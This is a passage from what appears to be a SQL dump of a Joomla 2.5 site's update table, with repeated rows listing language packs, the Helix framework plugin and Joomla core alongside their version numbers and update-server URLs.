Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(811,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(812,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(813,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(814,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(815,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(816,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(817,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(818,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(819,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(820,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(821,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(822,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(823,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(824,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(825,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(826,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(827,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(828,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(829,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(830,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(831,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(832,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(833,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(834,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(835,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(836,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(837,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(838,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(839,3,0,0,'Esperanto','','pkg_eo-XX','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/eo-XX_details.xml',''),(840,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(841,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(842,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(843,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(844,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(845,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(846,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(847,1,0,0,'Joomla','','joomla','file','',0,'2.5.22','','http://update.joomla.org/core/extension.xml',''),(848,1,0,0,'Joomla','','joomla','file','',0,'2.5.22','','http://update.joomla.org/core/extension.xml',''),(849,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(850,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(851,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(852,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(853,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(854,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(855,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(856,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(857,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(858,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(859,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(860,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(861,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(862,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(863,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(864,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(865,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(866,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(867,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(868,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(869,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(870,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(871,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(872,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(873,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(874,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(875,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(876,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(877,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(878,3,0,0,'Esperanto','','pkg_eo-XX','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/eo-XX_details.xml',''),(879,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(880,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(881,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(882,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(883,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(884,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(885,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(886,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(887,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(888,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(889,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(890,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(891,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(892,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(893,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(894,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(895,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(896,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(897,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(898,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(899,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(900,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(901,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(902,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(903,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(904,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(905,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(906,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(907,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(908,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(909,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(910,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(911,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(912,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(913,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(914,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(915,3,0,0,'Esperanto','','pkg_eo-XX','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/eo-XX_details.xml',''),(916,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(917,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(918,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(919,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(920,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(921,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(922,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(923,1,0,0,'Joomla','','joomla','file','',0,'2.5.22','','http://update.joomla.org/core/extension.xml',''),(924,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(925,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(926,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(927,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(928,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(929,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(930,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(931,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(932,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(933,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(934,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(935,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(936,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(937,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(938,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(939,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(940,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(941,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(942,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(943,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(944,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(945,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(946,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(947,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(948,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(949,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(950,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(951,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(952,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(953,3,0,0,'Esperanto','','pkg_eo-XX','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/eo-XX_details.xml',''),(954,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(955,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(956,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(957,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(958,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(959,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(960,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(961,1,0,0,'Joomla','','joomla','file','',0,'2.5.22','','http://update.joomla.org/core/extension.xml',''),(962,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(963,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(964,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(965,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(966,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(967,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(968,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(969,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(970,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(971,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(972,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(973,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(974,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(975,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(976,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(977,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(978,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(979,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(980,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(981,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(982,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(983,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(984,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(985,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(986,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(987,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(988,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(989,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(990,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(991,3,0,0,'Esperanto','','pkg_eo-XX','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/eo-XX_details.xml',''),(992,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(993,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(994,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(995,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(996,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(997,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(998,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(999,1,0,0,'Joomla','','joomla','file','',0,'2.5.22','','http://update.joomla.org/core/extension.xml',''),(1000,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(1001,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(1002,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(1003,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(1004,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(1005,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(1006,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(1007,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(1008,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(1009,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(1010,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(1011,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(1012,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(1013,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(1014,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(1015,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(1016,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(1017,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(1018,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(1019,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(1020,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(1021,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(1022,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(1023,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(1024,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(1025,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(1026,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(1027,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(1028,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(1029,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(1030,3,0,0,'Chinese 